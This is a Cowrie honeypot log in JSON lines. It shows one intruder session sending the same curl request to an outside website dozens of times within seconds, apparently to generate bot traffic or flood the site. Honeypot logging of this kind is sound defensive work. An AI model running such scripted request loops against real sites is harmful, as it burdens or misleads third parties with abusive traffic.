{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.393701Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.431076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.432255Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.469397Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.470622Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.508576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.509433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.551382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.552543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.595439Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.596634Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.633550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.634751Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.674147Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.675295Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.722397Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.723491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.760175Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.761310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.798029Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.799121Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.836037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.837074Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.873788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.874840Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.912060Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.913388Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.952100Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.953150Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.989765Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.990792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.027484Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.028813Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.065510Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.066418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.114423Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.115538Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.152325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.153644Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.190783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.191844Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.228894Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.230055Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.266919Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.268328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.305234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.306310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.343332Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.344384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.385653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.386993Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.423617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.424607Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.463336Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.464339Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.511479Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.512884Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.549704Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.550839Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.587936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.589057Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.632531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.634558Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.673630Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.674693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.711254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.712234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.834757Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.836297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.891017Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.892218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.935139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.936311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:23.975631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:23.977083Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.031588Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.032703Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.072461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.073565Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.110105Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.111459Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.147860Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.148918Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.185653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.186601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.226705Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.228066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.267431Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.268603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.306284Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.307420Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.344657Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.345905Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.383722Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.384786Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.432122Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.433279Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.472212Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.473586Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.510780Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.511799Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.564322Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.565321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.601879Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.602934Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.642366Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.643452Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.682554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.683654Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.723254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.724306Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.762856Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.763899Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.800669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.801793Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.849519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.850866Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.888338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.889503Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.926715Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.928079Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:24.979513Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:24.980692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.018023Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.019284Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.056295Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.057718Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.094864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.096058Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.133495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
